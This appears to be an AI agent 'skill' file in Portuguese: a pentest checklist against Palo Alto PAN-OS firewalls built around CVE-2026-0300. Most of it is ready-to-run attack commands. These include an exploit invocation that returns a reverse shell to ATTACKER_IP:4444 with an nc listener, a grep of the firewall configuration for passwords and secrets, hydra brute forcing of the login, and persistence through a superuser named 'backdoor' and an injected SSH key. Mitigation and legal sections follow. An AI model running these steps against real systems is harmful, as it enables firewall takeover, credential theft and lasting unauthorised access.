| name | pentest-paloalto |
| description | Pentest especializado para Palo Alto Networks PAN-OS — cobre CVE-2026-0300 (buffer overflow RCE), User-ID Auth Portal, e superfície de ataque completa |
| type | skill |
Pentest Palo Alto Networks PAN-OS — Checklist Completo
Objetivo
Avaliar a segurança de firewalls Palo Alto Networks PAN-OS, com foco na vulnerabilidade crítica CVE-2026-0300 (buffer overflow com RCE root sem autenticação) e outras superfícies de ataque conhecidas.
🔗 Cross-Reference: Outras Skills
pfSense
Se durante o pentest você identificar pfSense no mesmo alvo ou em firewalls adjacentes:
httpx -u https://TARGET -title -tech-detect | grep -i pfsense
cPanel & WHM (CVE-2026-41940)
httpx -u https://TARGET:2087 -title -tech-detect
python3 /root/.pcode/pocs/cPanel/CVE-2026-41940/poc.py \
-t https://TARGET:2087 -u admin -p password detect
CVE-2026-0300 — Buffer Overflow no User-ID Auth Portal (CRÍTICO)
Informações da Vulnerabilidade
| Campo | Valor |
|---|
| CVE | CVE-2026-0300 |
| CVSS 4.0 | 9.3 (Critical) |
| CWE | CWE-787 (Out-of-bounds Write) |
| Tipo | Buffer Overflow / Memory Corruption |
| Autenticação | NÃO requer autenticação |
| Impacto | RCE como root no firewall |
| Status | Exploração ativa na internet |
| Patch disponível | Entre 13-28 de maio de 2026 |
Versões Afetadas
PAN-OS 10.2: < 10.2.7-h34, < 10.2.10-h36, < 10.2.13-h21, < 10.2.16-h7, < 10.2.18-h6
PAN-OS 11.1: < 11.1.4-h33, < 11.1.6-h32, < 11.1.7-h6, < 11.1.10-h25, < 11.1.13-h5, < 11.1.15
PAN-OS 11.2: < 11.2.4-h17, < 11.2.7-h13, < 11.2.10-h6, < 11.2.12
PAN-OS 12.1: < 12.1.4-h5, < 12.1.7
Pré-requisitos para Exploração
- User-ID Authentication Portal (Captive Portal) habilitado
- Portal acessível a partir de redes não confiáveis (Internet-facing)
Mecanismo do Ataque
1. Atacante envia pacote especialmente construído para o User-ID Auth Portal
2. Buffer overflow do tipo "out-of-bounds write" (CWE-787)
3. Corrupção de memória permite execução de código arbitrário
4. Shell root obtido no firewall
Impacto do Comprometimento
Um firewall de perímetro comprometido com acesso root permite:
- Movimentação lateral para rede interna
- Interceptação de tráfego (MITM em escala)
- Coleta de credenciais de todos os usuários
- Comprometimento completo da rede
- Persistence via configurações do firewall
Fase 1 — Detecção e Reconhecimento
1.1 Identificar Painel PAN-OS
nuclei -u https://TARGET -t /root/nuclei-templates/panos-management-panel.yaml -silent
nuclei -u https://TARGET -tags panos,paloalto -silent
curl -sk "https://TARGET/php/login.php" | grep -iE "PAN_FORM_CONTENT|Login|Palo Alto"
shodan search "http.title:\"Palo Alto Networks\""
shodan search "http.favicon.hash:873381299"
shodan host <TARGET_IP>
censys search "services.http.response.html_title:Palo Alto"
censys search "ip:<TARGET_IP>"
1.2 Verificar User-ID Auth Portal
for path in "/php/portal.php" "/portal" "/global-protect" "/php/login.php"; do
echo -n "$path: "
curl -sk -o /dev/null -w "%{http_code}" "https://TARGET${path}"
echo
done
nuclei -u https://TARGET -tags captive-portal,authentication -silent
1.3 Fingerprinting de Versão
curl -sk "https://TARGET/php/login.php" | grep -iE "PAN-OS|version|[0-9]+\.[0-9]+\.[0-9]+"
curl -sk "https://TARGET/api/?type=version" | grep -i version
snmpwalk -v2c -c public TARGET 1.3.6.1.2.1.1.1.0 | grep -i palo
nmap -sV -p 443,80,8080 --script http-title,http-headers TARGET
1.4 Portas e Serviços PAN-OS
| Porta | Protocolo | Serviço | Risco |
|---|
| 443 | TCP | Web Management | Alto |
| 80 | TCP | Web Management (redirect) | Médio |
| 8080 | TCP | Alternative HTTP | Médio |
| 22 | TCP | SSH (se habilitado) | Alto |
| 161 | UDP | SNMP (se habilitado) | Alto |
| 500 | UDP | IKE/IPSec | Médio |
| 4500 | UDP | IPSec NAT-T | Médio |
| 9001 | TCP | PanOS API | Alto |
Fase 2 — Teste de Vulnerabilidade CVE-2026-0300
2.1 Detecção da Vulnerabilidade
python3 /root/.pcode/pocs/PaloAlto/CVE-2026-0300/poc.py \
-t https://TARGET detect
python3 /root/.pcode/pocs/PaloAlto/CVE-2026-0300/poc.py \
-t https://TARGET check-version
2.2 Exploração (APENAS em testes autorizados)
python3 /root/.pcode/pocs/PaloAlto/CVE-2026-0300/poc.py \
-t https://TARGET exploit
python3 /root/.pcode/pocs/PaloAlto/CVE-2026-0300/poc.py \
-t https://TARGET exploit \
--host ATTACKER_IP --port 4444
nc -lvnp 4444
2.3 Exploração Manual (Se PoC não disponível)
Fase 3 — Pós-Exploração
3.1 Coleta de Informações
cat /config/panos-config.xml
grep -r "password\|secret\|key\|credential" /config/
show interface all
show rules all
cat /var/log/auth.log | tail -100
3.2 Movimentação Lateral
show routing route
show vpn tunnel
show session all
3.3 Persistência
configure
set mgt-config users backdoor password
set mgt-config users backdoor permissions role-based superuser yes
commit
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys
Fase 4 — Outras Vulnerabilidades PAN-OS
4.1 CVE-2024-0015 — Authentication Bypass
nuclei -u https://TARGET -t cves/2024/CVE-2024-0015.yaml -silent
curl -sk "https://TARGET/php/login.php" | grep -i "PAN-OS"
4.2 GlobalProtect Vulnerabilities
curl -sk "https://TARGET/global-protect/" | grep -i "globalprotect"
nuclei -u https://TARGET -tags globalprotect -silent
4.3 PAN-OS Default Credentials
hydra -l admin -P /usr/share/wordlists/rockyou.txt \
https-post-form://TARGET/php/login.php:username=^USER^&password=^PASS^:F=incorrect -t 1
4.4 API Vulnerabilities
curl -sk "https://TARGET/api/?type=version"
Fase 5 — Mitigações e Remediação
5.1 Mitigações Imediatas (Antes do Patch)
5.2 Aplicação de Patch
show system info
5.3 Verificação de Patch
show system info | match Version
python3 /root/.pcode/pocs/PaloAlto/CVE-2026-0300/poc.py \
-t https://TARGET detect
Fase 6 — Auditoria de Segurança
6.1 Checklist de Auditoria
6.2 Comandos de Auditoria (Via SSH/CLI)
show user-id captive-portal status
show user-id captive-portal config
show logging system | match "captive-portal\|auth-portal"
show deviceconfig system allowed-ip
show deviceconfig system service
Ferramentas e Recursos
Nuclei Templates Instalados
/root/nuclei-templates/panos-management-panel.yaml
nuclei -u https://TARGET -t /root/nuclei-templates/panos-management-panel.yaml
PoCs Disponíveis
/root/.pcode/pocs/PaloAlto/CVE-2026-0300/poc.py
Shodan Queries
http.title:"Palo Alto Networks"
http.favicon.hash:873381299
product:"PAN-OS"
Referências
Notas de Exploração
Considerações Legais
ATENÇÃO: Esta skill é destinada APENAS para:
- Testes de penetração autorizados
- Auditorias de segurança contratadas
- Pesquisa de segurança em ambiente controlado
- Bug bounty programs (dentro do scope)
Riscos de Exploração
CVE-2026-0300 é uma vulnerabilidade de memory corruption. A exploração pode:
- Causar crash do firewall (DoS)
- Corromper configurações
- Triggerar logs de segurança
- Ser detectada por sistemas de prevenção
Ambiente de Teste
Sempre teste em ambiente laboratorial antes de produção:
- VM PAN-OS isolada
- Rede de teste sem produção
- Backup de configuração antes de testes
- Documentação completa de todas as ações
Resumo Executivo
CVE-2026-0300 representa um risco CRÍTICO para organizações com firewalls Palo Alto Networks PAN-OS:
- CVSS 9.3 — Score máximo para vulnerabilidades remotas
- Sem autenticação — Atacante externo pode explorar
- RCE como root — Controle total do firewall
- Exploração ativa — Já sendo usado em ataques reais
- Patch entre 13-28 maio 2026 — Janela de vulnerabilidade estendida
Ações Imediatas Recomendadas:
- Identificar todos os firewalls PAN-OS na organização
- Verificar se User-ID Auth Portal está exposto à Internet
- Restringir acesso ou desabilitar portal imediatamente
- Aplicar patch quando disponível
- Monitorar logs por tentativas de exploração
- Considerar firewall comprometido se exposto antes da mitigação